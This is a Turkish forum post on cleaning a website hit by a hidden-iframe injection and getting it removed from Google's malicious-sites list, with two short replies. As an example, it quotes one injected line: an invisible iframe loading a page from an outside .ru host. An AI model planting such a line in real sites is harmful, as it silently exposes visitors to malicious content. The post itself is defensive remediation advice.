Bu site bilgisayarınıza zarar verebilir uyarısı ve çözümü (Iframe virüsü)

//:U.N.G.O.O.D

Altın Üye
Katılım
26 Ara 2006
Mesajlar
7,590
Reaction score
0
Puanları
0
Yaş
37
Konum
[20] DENİZLİ

Sık sık gördüğümüz “Bu site bilgisayarınıza zarar verebilir” uyarısı. Basit bir şekilde işliyor bulaşma mantığı. Virüs ve/ya casus yazılım bulaşmış bir bilgisayar düşünün ve tabii tüm sitelerinize bu bilgisayardan erişiyorsunuz. Tüm ftp bilgileriniz, eposta bilgileriniz vs. bu bilgisayarda mevcut ve kayıtlı. Bu kötü yazılım bunları ele geçirdikten sonra kendisini hazırlayan “badguy”a gönderiyor. Tabii bu arkadaş ya kendi kullanıyor ya hazırladığı otomasyona sokarak sisteminizi enfekte ediyor. Aslında bu genel anlamda bir virüs sayılmaz. Sadece ftp’ye erişerek index (index.php, default.asp gibi) dosyalarına bir kod parçacığı ekliyor. Aşağıda bahsettiğimiz kodun bir örneği mevcuttur;

<iframe src=”http://site.ru.tld:8080/index.php”width=177 height=181 style=”visibility:hidden”></iframe> :thumbdown:

Bu kod parçaçığıda Google zararlı olarak işaretlediği için sitenizde zararlı olarak işaretlenmiş oluyor. Bu durumda Firefox, Google Chrome ve Google Aramadan gelen ziyaretçileriniz “Bu site bilgisayarınıza zarar verebilir” ekranıyla karşılaşıyor.

Tüm yazdıklarımızından sonra asıl amacımız olan “Bu koddan nasıl kurtulacağınız?” sorusuna gelelim. İlk olarak tüm yedeklerinizi almanızı tavsiye ederim. İşlem sırasında hata çıkma olasılığına karşı virüslü de olsa yedeklerin olması sağlıklı olacaktır. Tüm site dosyalarımızda yukarıda örneği yer alan kodu arayarak silmeliyiz. Genelde index dosyalarında olsa da diğer tüm dosyaları kontrol edip temizlemeniz çok daha doğru olacaktır. Ardından temiz bir bilgisayarda tüm düzelttiğiniz dosyaları ftp’dekileri silerek tekrar yükleyiniz. FTP, kontrol paneli ve diğer hizmet şifrelerinizi değiştirmeyide unutmayınız tabii ki.

Sırada sitenizi Google’ın zararlı siteler listesinden çıkarma işlemi var. Bu tam olarak bizim kontrolümüzde olan bir durum olmadığı için Google’ın sunduğu Webmaster Tools‘u kullanacağız.

Giriş işlemlerinizi yaptıktan sonra aşağıdaki işlemleri sırasıyla yapmanız gerekmektedir.

1. Site Ekleyin tuşunu tıkladıktan sonra çıkan ekranda site adresinizi giriniz.

2. Sahip olduğunu doğrula sayfasında doğrulama türünü seçerek söylenen işlemleri yapınız. Ben kolay olması için dosya yüklemeyi seçip devam ediyorum.

3. Onay işlemini yaptıktan sonra Google Webmasters Tools bize sitenin durumu hakkında bilgi verecektir. Eğer zararlı site şeklinde işaretli ise bu konuda da ekranda uyarı gösterilecektir.

4. Bu durumdan kurtulma yöntemlerinden bahseden sayfadaki “İnceleme Talep Et” butonunu tıklamadan önce metin alanına kısa bir açıklama girmeniz uygun olacaktır.

İşlemler şuan için bu kadar. Google 3-5 saat içinde büyük ihtimalle talebinizi işleme alacak ve sitenizi zararlı listesinden çıkaracaktır. Hayırlı olsun. :durdurun

Bu durum böyleyse büyük siteler sürekli bunumu takip ediyorlar yoksa bua karşı otamatik kod yazıp otomatik mi işliyor
Tartışalım ..

 
hemen ne zaman araştırıverdin =)
bu büyük siteler nasıl başa cıkıyor ki bunlarla genelde 1-2 yöntem varda pek tatmin edici deil ..
 
Geri
Üst